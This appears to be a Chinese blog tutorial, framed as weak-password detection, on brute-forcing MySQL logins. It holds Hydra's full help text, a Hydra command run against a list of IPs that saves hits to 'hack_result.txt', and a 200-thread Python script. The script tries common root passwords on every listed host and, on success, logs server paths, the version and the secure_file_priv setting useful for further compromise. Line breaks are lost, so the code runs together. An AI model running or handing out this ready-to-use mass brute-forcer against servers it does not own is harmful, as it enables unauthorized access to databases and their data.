如何自动化检测Mysql的弱口令，这里介绍介绍两种方式。

一、hydra

hydra是一个口令爆破工具，kali系统自带。

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]Options:  -R        restore a previous aborted/crashed session  -I        ignore an existing restore file (don't wait 10 seconds)  -S        perform an SSL connect  -s PORT   if the service is on a different default port, define it here  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help  -y        disable use of symbols in bruteforce, see above  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login  -u        loop around users, not passwords (effective! implied with -x)  -C FILE   colon separated "login:pass" format, instead of -L/-P options  -M FILE   list of servers to attack, one entry per line, ':' to specify port  -o FILE   write found login/password pairs to FILE instead of stdout  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)  -t TASKS  run TASKS number of connects in parallel per target (default: 16)  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)  -w / -W TIME  wait time for a response (32) / between connects per thread (0)  -c TIME   wait time per login attempt over all threads (enforces -t 1)  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode   -O        use old SSL v2 and v3  -q        do not print messages about connection errors  -U        service module usage details  -h        more command line options (COMPLETE HELP)  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)  service   the service to crack (see below for supported protocols)  OPT       some service modules support additional input (-U for module help)Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmppHydra is a tool to guess/crack valid login/password pairs. Licensed under AGPLv3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydraDon't use in military or secret service organizations, or for illegal purposes.These services were not compiled in: afp ncp oracle sapr3.Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)Examples:  hydra -l user -P passlist.txt ftp://192.168.0.1  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5  hydra -l admin -p password ftp://[192.168.0.0/24]/  hydra -L logins.txt -P pws.txt -M targets.txt ssh

常用爆破字典可使用kali自带的/usr/share/wordlists/

hydra -L user.txt -P password.txt -M 3306_ips.txt -o hack_result.txt -q -f mysql

结果

hydra爆破mysql数据库结果

可参考

二、使用python爆破mysql

使用Python的mysql客户端连接mysql进行爆破

#-*- coding:utf-8 -*-# author:wlj# time:2020/2/29 22:20# 使用python对mysql数据库口令进行爆破import mysql.connectorimport threadingimport queuetask_queue = queue.Queue()#口令字典weak_pwd_list = ['root','123456','12345','mysql','111111','12345678']#互斥量，用于控制线程对task_queue变量的访问threadLock = threading.Lock()def test(ip):    for password in weak_pwd_list:        try:            conn = mysql.connector.connect(host=ip,user='root',password=password,database='mysql',port=3306) #连接数据库            cursor = conn.cursor()            sql = 'SELECT @@global.basedir,@@global.general_log_file,@@global.version,@@global.version_compile_os,@@global.secure_file_priv;'            cursor.execute(sql)            basedir,general_log_file,version,version_compile_os,secure_file_priv = [str(x) for x in cursor.fetchone()]            #print(basedir,general_log_file,version,version_compile_os,secure_file_priv)            cursor.close()#关闭数据库            conn.close()            print('%s,%s,%s'%(ip,'root',password))            formart_str = '%s,'*8+'\n'            #将结果存入文件            open('mysql_weak_pwd.csv','a').write(formart_str%(ip,'root',password,basedir,general_log_file,version,version_compile_os,secure_file_priv))            return         except Exception as e:            continuedef brute_mysql():    global task_queue    while True:        # 获取锁，用于线程同步        threadLock.acquire()        if task_queue.empty():            threadLock.release()            return        ip = task_queue.get()        threadLock.release()        test(ip)def main():    ip_list =  open('3306_ips.txt','r').read().split('\n')    open('mysql_weak_pwd.csv','w').write('ip,user,password,basedir,general_log_file,version,version_compile_os,secure_file_priv\n')    for ip in ip_list:        ip = ip.strip()        if ip:            task_queue.put(ip)    threads = []    for i in range(0,200):        t = threading.Thread(target=brute_mysql)        t.start()        threads.append(t)    for t in threads:        t.join()main()

结果

python扫描结果